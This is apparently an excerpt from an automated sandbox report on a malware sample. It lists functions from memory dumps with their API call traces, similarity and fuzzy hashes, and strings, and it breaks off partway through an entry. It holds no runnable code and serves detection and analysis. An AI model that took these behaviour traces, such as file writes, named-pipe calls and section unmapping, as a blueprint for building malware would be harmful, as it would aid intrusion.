  • Instruction Fuzzy Hash: faed8b72c47cb1bc77f0cf104ccb7fc234e9d1564366b5239b25521f33b16b83
APIs
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BA6
  • SetEndOfFile.KERNEL32(01B34303,?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BB2
  • CloseHandle.KERNEL32(01B34303), ref: 01B32BBB
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BC3
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32BFE
  • FlushFileBuffers.KERNEL32(00000000), ref: 01B32C08
  • GetLastError.KERNEL32(?,01B32FC4,?,01B34303,0AEBFFFF), ref: 01B32C10
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001C70F5, Relevance: 10.6, APIs: 7, Instructions: 91 Total matches: 60memorystringsynchronization
Similarity
  • Total matches: 60
  • API ID: lstrlen$GetDriveTypeHeapFreeRtlAllocateHeapWaitForSingleObjectmemset
  • String ID:
  • API String ID: 3218151923-0
  • Opcode ID: 974418b0150871375a409eae20db66cf184f8890a346e9cc83530061c0aa9893
  • Instruction ID: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
  • Opcode Fuzzy Hash: 97F02461CA2887A7900B446974553AEDA116F416C9D4C0B62ED412814EAF0732E6EB4A
  • Instruction Fuzzy Hash: 718056d6f187fa39222f68099688de0a74eaf81b8bf602d31d72af443bcdc1fc
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C713F
  • memset.NTDLL ref: 001C715C
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C7178
  • GetDriveTypeW.KERNEL32(?), ref: 001C7186
  • lstrlenW.KERNEL32(?), ref: 001C7192
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • lstrlenW.KERNEL32(?), ref: 001C71BF
  • HeapFree.KERNEL32(00000000,?), ref: 001C71D8
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6DF6, Relevance: 10.6, APIs: 7, Instructions: 90 Total matches: 57filesynchronization
Similarity
  • Total matches: 57
  • API ID: GetLastError$CloseHandleSetEndOfFileSetFilePointerWaitForSingleObjectWriteFile
  • String ID:
  • API String ID: 1310882240-0
  • Opcode ID: 428b72d32063ac54d5b905598191ac261dcad3cf285b84f146690d990cf327a1
  • Instruction ID: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
  • Opcode Fuzzy Hash: CAF02BA0515DC14BC217346516727BFD904EB425C5E4C7372A840420494F06769BAB5A
  • Instruction Fuzzy Hash: dcc1f0eea94f17c23c7c4056169672324f7f45eda8cbecba194d1740a202e92d
APIs
  • GetLastError.KERNEL32 ref: 001D6E41
  • WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
  • SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
  • WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
  • SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
  • GetLastError.KERNEL32 ref: 001D6EDD
  • CloseHandle.KERNEL32(00000006), ref: 001D6EE9
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001CBD48, Relevance: 10.6, APIs: 7, Instructions: 89 Total matches: 58memorystringpipe
Similarity
  • Total matches: 58
  • API ID: memcpy$CallNamedPipeGetLastErrorHeapFreeRtlAllocateHeaplstrlen
  • String ID:
  • API String ID: 1038157847-0
  • Opcode ID: 6bb6ae630451ca86ee9df0719d803bcc4810f9cd3f6b8a390704e6ae44b564aa
  • Instruction ID: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
  • Opcode Fuzzy Hash: 73F05990085A81D2C123B42951217FFF194BEC02DBCDEA772E8E21885E2E0162A06B5D
  • Instruction Fuzzy Hash: d7136f0b4a8b8e64e1482e4ffc83bf206dde2669044bc75a112f480993e26001
APIs
  • lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
  • memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
  • memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
  • CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
  • GetLastError.KERNEL32 ref: 001CBE07
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C79A7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 87 Total matches: 56memoryfilestring
Similarity
  • Total matches: 56
  • API ID: HeapFree$DeleteFileStrTrimlstrlen
  • String ID: ss: *.*.*.*
  • API String ID: 1870149019-856079725
  • Opcode ID: 59ebdf1013b10810b54038a6e3da88a7dec1c4f015ef1646412946d67e45a806
  • Instruction ID: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
  • Opcode Fuzzy Hash: ECF09E21084D41AF8937286A50607F50915FB804F1C4DCFB7AC857B2857F836228BB4B
  • Instruction Fuzzy Hash: 3e73fb68dc78fb4356d5e34d04681ca3597a6c9d6a42a3bec15409b0af14ccc2
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • lstrlen.KERNEL32(00000000,?,00000F00), ref: 001C79CB
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • StrTrimA.SHLWAPI(00000000,001E53D4), ref: 001C7A55
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7A72
  • DeleteFileA.KERNEL32(00000000,00000000,?,?,001ECE60,00000000,?,00000F00), ref: 001C7A7A
  • HeapFree.KERNEL32(00000000,00000000,001ECE60), ref: 001C7A89
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C7D61, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 75 Total matches: 58memory
Similarity
  • Total matches: 58
  • API ID: memcpy$RtlAllocateHeap
  • String ID: [URL]$https://
  • API String ID: 3738462082-2839221783
  • Opcode ID: afc151603a67bdcf01d5cf8a846d0f5f8a912d4aa94ead1b687b7b5f553c7413
  • Instruction ID: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
  • Opcode Fuzzy Hash: 21E02B245D1F02D6D85A20845438BB7C6873D42394CAE7766C950255772A25B174B588
  • Instruction Fuzzy Hash: 8b64b784777f98c5150798b715af9fa38b42791515c7252616206b20b48db7ab
APIs
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
  • memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
  • memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
  • memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C771B, Relevance: 10.6, APIs: 7, Instructions: 71 Total matches: 62memoryfilestring
Similarity
  • Total matches: 62
  • API ID: HeapFree$CloseHandleCreateFileRtlAllocateHeaplstrlenmbstowcs
  • String ID:
  • API String ID: 1841334458-0
  • Opcode ID: 88abf7bf9e6c094b0eee3fb77fa4d18763972b4349be3218ed9dbfc152fe13ca
  • Instruction ID: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
  • Opcode Fuzzy Hash: 2BE02B71181D5096C02719A68C58339E6056F422E4E5D4627FA013910FB24317E8EBAB
  • Instruction Fuzzy Hash: b1b32dbb2b339a72f492d846fbfcd069bc98c7ba0488c115e2d4a43b7119fad5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C7527: LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 001C75DB
    • Part of subcall function 001C7527: WaitForSingleObject.KERNEL32(00000000,00000000), ref: 001C75FC
  • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
  • lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
  • RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
  • mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C7B90: GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
    • Part of subcall function 001C7B90: memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
    • Part of subcall function 001C7B90: RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
    • Part of subcall function 001C7B90: lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7B90: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
  • CloseHandle.KERNEL32(?), ref: 001C77C0
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C2416, Relevance: 10.6, APIs: 7, Instructions: 62 Total matches: 50memorystringthread
Similarity
  • Total matches: 50
  • API ID: CloseHandleCreateThreadGetLastErrorHeapFreeRtlAllocateHeaplstrcpylstrlen
  • String ID:
  • API String ID: 1766977795-0
  • Opcode ID: b41ce86395a358d9a6be2e887350fb16e7ee7d04885f28ea6336c7c9663497fb
  • Instruction ID: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
  • Opcode Fuzzy Hash: A8E026A5068C0583807778228061BAF9B82BAC10D8C8D7123FE402614B2F037487DF2B
  • Instruction Fuzzy Hash: 96ec21c43bdbaae9be4f5f8da8c7882276515f35e524364d2f59df83c05b1c59
APIs
  • lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
  • RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
  • lstrcpy.KERNEL32(00000008,?), ref: 001C2462
  • CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
  • CloseHandle.KERNEL32(00000000), ref: 001C2485
  • GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C5C23, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59 Total matches: 27stringtime
Similarity
  • Total matches: 27
  • API ID: lstrcmpi$GetSystemTimeAsFileTimeRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID: Main
  • API String ID: 3521027233-521822810
  • Opcode ID: bc401ce39ed135578d671bff3c7e0c2395a673578b9a283240c4e40e0584cd5d
  • Instruction ID: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
  • Opcode Fuzzy Hash: 10E02B34084403D7901B60A90C06F18DE4EF3603C8CCE2A65C41129A061B56326E2F3B
  • Instruction Fuzzy Hash: 21906b460c7dcbc5898723b16b272b466b629f8a7c325451b17217bd0ccc14f7
APIs
  • lstrcmpi.KERNEL32(00000000,Main), ref: 001C5C44
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5C56
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5C69
  • lstrcmpi.KERNEL32(001EB260,00000000), ref: 001C5C8A
  • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,?,001C9732,00000000), ref: 001C5C9E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C4EEE, Relevance: 9.2, APIs: 6, Instructions: 187 Total matches: 61memorystringthread
Similarity
  • Total matches: 61
  • API ID: GetCurrentThreadGetCurrentThreadIdRtlAllocateHeaplstrcmplstrlenwsprintf
  • String ID:
  • API String ID: 236900386-0
  • Opcode ID: 0432ee343612a59173c04e27a8b524be30c23a17c6314db2962a76565d5ddb3c
  • Instruction ID: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
  • Opcode Fuzzy Hash: F7119B31058EC2A7441760C18092BBED450FC920E580D37F2EEB86A2CE6F43258B2B1B
  • Instruction Fuzzy Hash: 7b15706a537a474bb122a8de5c1759b17b8367dcae199ddad95220069e92854f
APIs
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C46AF
    • Part of subcall function 001C45F0: WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,?), ref: 001C473C
    • Part of subcall function 001C45F0: HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
    • Part of subcall function 001C45F0: RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
    • Part of subcall function 001D829C: lstrlen.KERNEL32(?,00000000,001EABBC,?,001C194F,?), ref: 001D82A6
    • Part of subcall function 001D829C: StrRChrA.SHLWAPI(?,00000000,0000002E), ref: 001D82D1
    • Part of subcall function 001D829C: lstrcat.KERNEL32(00000000,?), ref: 001D8317
  • lstrcmp.KERNEL32(?,?), ref: 001C4F65
  • GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
  • GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBD3F: memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001DBD3F: NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DBD3F: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
    • Part of subcall function 001DBD3F: CloseHandle.KERNEL32(00000000), ref: 001DBF7D
    • Part of subcall function 001DBD3F: memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C1916: RegOpenKeyA.ADVAPI32(80000001,?), ref: 001C192A
    • Part of subcall function 001C1916: RegCloseKey.ADVAPI32(?), ref: 001C1958
  • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
  • wsprintfA.USER32 ref: 001C50B7
  • lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C8CA3, Relevance: 9.1, APIs: 6, Instructions: 72 Total matches: 58memorystring
Similarity
  • Total matches: 58
  • API ID: HeapFreelstrlen$mbstowcswcstombs
  • String ID:
  • API String ID: 2099024402-0
  • Opcode ID: e75e910ff2ec0d94baf6de8394c43fdc3fb5dca6cdb9e0b5bf2cf534734101ee
  • Instruction ID: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
  • Opcode Fuzzy Hash: 88E02BB20C04C297060710B3847577DDA09BCC21D100E53ABDB08EC34DA68723A5BB6F
  • Instruction Fuzzy Hash: f24fee1122799b27caa4df9cbb6a3a124512d5817c5fb220c5a419a916dfbbd2
APIs
  • lstrlenW.KERNEL32(?), ref: 001C8CC7
  • wcstombs.NTDLL ref: 001C8CE7
    • Part of subcall function 001C8B4E: RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
    • Part of subcall function 001C8B4E: memcpy.NTDLL(00000000,?,?), ref: 001C8C27
    • Part of subcall function 001C8B4E: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
  • lstrlen.KERNEL32(00000000), ref: 001C8D0B
  • mbstowcs.NTDLL ref: 001C8D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D3F
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8D59
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 01B34B0D, Relevance: 9.0, APIs: 6, Instructions: 40 Total matches: 320file
Similarity
  • Total matches: 320
  • API ID: GetLastError$CloseHandleCreateFileSetEndOfFileWriteFile
  • String ID:
  • API String ID: 3756146440-0
  • Opcode ID: 4915370d64bf5c115dcc7df05119504ed8106c73e5c20004021290fc9b098e04
  • Instruction ID: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
  • Opcode Fuzzy Hash: A8D0126D078B4ED4D91985A715E2F03E1915F33700E3C460872607926A8B3673AEDF49
  • Instruction Fuzzy Hash: 25e21f08b45b65ae728795522a9e901a714bf6768e996c71cc9bf29c7ae853b0
APIs
  • CreateFileW.KERNEL32(01B37494,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 01B34B26
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B33
  • WriteFile.KERNEL32(00000000,?,00001000,01B37494,00000000), ref: 01B34B49
  • SetEndOfFile.KERNEL32(00000000,?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B54
  • GetLastError.KERNEL32(?,01B32C59,00000000,01B37494,?,00001FD1,00000000,00000000,?,?,01B318C5,?,?), ref: 01B34B5C
  • CloseHandle.KERNEL32(00000000), ref: 01B34B65
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Function 001DD36B, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 207 Total matches: 57sleepsynchronization
Similarity
  • Total matches: 57
  • API ID: SetLastErrorSleepWaitForSingleObjectmemset
  • String ID: vids
  • API String ID: 1012678829-3767230166
  • Opcode ID: a88323ab6a07f6567de602f156fbacf356d172862014bdadb632bb7e4ac17ede
  • Instruction ID: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
  • Opcode Fuzzy Hash: E1216B4906CCE1E3D8E268440463F6D32146F83DFAD4DA72667BE9A6D75F012306D629
  • Instruction Fuzzy Hash: 7794b0509761be8d864e16b56acb391e5ba30bd334e757b795fdcad4b1508c3e
APIs
  • memset.NTDLL ref: 001DD3C6
  • SetLastError.KERNEL32(00000000,?,?,?), ref: 001DD41A
    • Part of subcall function 001DD348: GetSystemTimeAsFileTime.KERNEL32(00000001,?,?,?,001DD513,?,00000000,00000000,?,?,?,?,00000000,?,?,?), ref: 001DD351
    • Part of subcall function 001DD348: _aulldiv.NTDLL(00000001,?,00002710,00000000), ref: 001DD364
  • WaitForSingleObject.KERNEL32(?,?), ref: 001DD599
  • Sleep.KERNEL32(?,?,?,00000001,?,?,00000000,0000000C,0000000F,?,00000000,00000000,?,?,?,?), ref: 001DD5AA
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001D6996, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 110 Total matches: 35
Similarity
  • Total matches: 35
  • API ID: FlushFileBuffersGetLastErrormemset
  • String ID: K$P
  • API String ID: 1157411244-420285281
  • Opcode ID: b776852dc2126f9b1b4d2b6506190c96010406ec9a84ebb4623d6614876d6961
  • Instruction ID: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
  • Opcode Fuzzy Hash: 8CF07B5009DB0086D877E4020147FC67EA2B782DC5C94B7E134D1B2F5F2E10914AD758
  • Instruction Fuzzy Hash: 690a8b8b9a9b9257472a4c9e9031e2b6228afbf5fdb6d6ed7caf7786d6f424c8
APIs
  • memset.NTDLL ref: 001D6A41
  • FlushFileBuffers.KERNEL32(00000000), ref: 001D6AA8
  • GetLastError.KERNEL32(?,00000000,00000000), ref: 001D6AB2
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C838C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 102 Total matches: 54memory
Similarity
  • Total matches: 54
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: https://
  • API String ID: 3817218409-4275131719
  • Opcode ID: f288712f8a6e8bd0bf07739e93ef791456e10643a80339435031cd9f7b6ed460
  • Instruction ID: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
  • Opcode Fuzzy Hash: 18F08B601A85C2A6802718C294AC7B2C604BE80AC0D8D536FFF503929E5FA770D5BB0A
  • Instruction Fuzzy Hash: 0d42b4968aba57015724f328e6a5f9a864d8608e83dd0059b415151ddedf116b
APIs
    • Part of subcall function 001C5ADD: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5AEB
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001C83ED
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C843C
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6E41
    • Part of subcall function 001D6DF6: WaitForSingleObject.KERNEL32(000000C8), ref: 001D6E66
    • Part of subcall function 001D6DF6: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 001D6EAF
    • Part of subcall function 001D6DF6: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 001D6EC4
    • Part of subcall function 001D6DF6: SetEndOfFile.KERNEL32(00000006), ref: 001D6ED1
    • Part of subcall function 001D6DF6: GetLastError.KERNEL32 ref: 001D6EDD
    • Part of subcall function 001D6DF6: CloseHandle.KERNEL32(00000006), ref: 001D6EE9
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8471
  • HeapFree.KERNEL32(00000000,?), ref: 001C8481
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C3F95, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80 Total matches: 37memorystring
Similarity
  • Total matches: 37
  • API ID: HeapFree$RtlAllocateHeaplstrcmpi
  • String ID: Main
  • API String ID: 2523190637-521822810
  • Opcode ID: f2d70ba1db336b0a4ac6973dd472b45d7992a95be766767dbdcbf8c120d66562
  • Instruction ID: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
  • Opcode Fuzzy Hash: 8DF095610946C3D35417545580B03B89004AFD22F2C4D43FAE9303D1CB7E1235D7765F
  • Instruction Fuzzy Hash: 50267dbfc79e7e53958b6cba9acd06bd661d4a86ea51a5bd4c245a4c386a7ff5
APIs
    • Part of subcall function 001DDAD4: memcpy.NTDLL(00000000,00000084,00000084,001CD4DC,00000000,00000000,001DDB4C,001CD4DC,001CD4DC,001CD4DC,00000000,?,?,001C4CB1,00000000,00000001), ref: 001DDAF2
    • Part of subcall function 001DDAD4: memset.NTDLL ref: 001DDB24
  • RtlAllocateHeap.NTDLL(00000000,00000008,-00000008), ref: 001C3FE9
  • lstrcmpi.KERNEL32(00000000,001ED273), ref: 001C4009
    • Part of subcall function 001C5816: lstrlen.KERNEL32(00000008,?,?,?,001C402D,00000000,00000000), ref: 001C5876
    • Part of subcall function 001C5816: HeapFree.KERNEL32(00000000,00000000), ref: 001C5898
    • Part of subcall function 001C5816: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,001C402D,00000000,00000000), ref: 001C58AA
    • Part of subcall function 001C5816: lstrcpy.KERNEL32(00000020,00000008), ref: 001C58DC
    • Part of subcall function 001C5816: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C58E8
    • Part of subcall function 001C5816: Sleep.KERNEL32(0000000A), ref: 001C58F2
    • Part of subcall function 001C5816: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5940
    • Part of subcall function 001C3F4D: RegCloseKey.ADVAPI32(?,?,?,001C403B,00000000,?,?,00000000,00000000,-00000008), ref: 001C3F87
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C404E
  • HeapFree.KERNEL32(00000000,?,?), ref: 001C405F
    • Part of subcall function 001DD67D: RtlEnterCriticalSection.NTDLL(001EB184), ref: 001DD68A
    • Part of subcall function 001DD67D: Sleep.KERNEL32(0000000A,?,?,001DD703,001EB1C8,001EAD10,00000000,001DDF84), ref: 001DD694
    • Part of subcall function 001DD67D: RtlLeaveCriticalSection.NTDLL(001EB184), ref: 001DD6E3
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Function 001C29BF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41 Total matches: 45memorystring
Similarity
  • Total matches: 45
  • API ID: CreateDirectoryHeapFreeRtlAllocateHeaplstrlen
  • String ID: %APPDATA%\Microsoft\
  • API String ID: 3959905781-2699254172
  • Opcode ID: a91e168cb75582dc69dc678417b6008db4073c04297a41e19573c560bdc487dc
  • Instruction ID: cffe0b6492667c1a66e0568daab83b9343bd146d6441e28ba88ab90f7e1d944e
  • Opcode Fuzzy Hash: 10D05EB0444802AB953BA426806A739884A7F823D0C5E7536E9404A26FBB9362956E6A
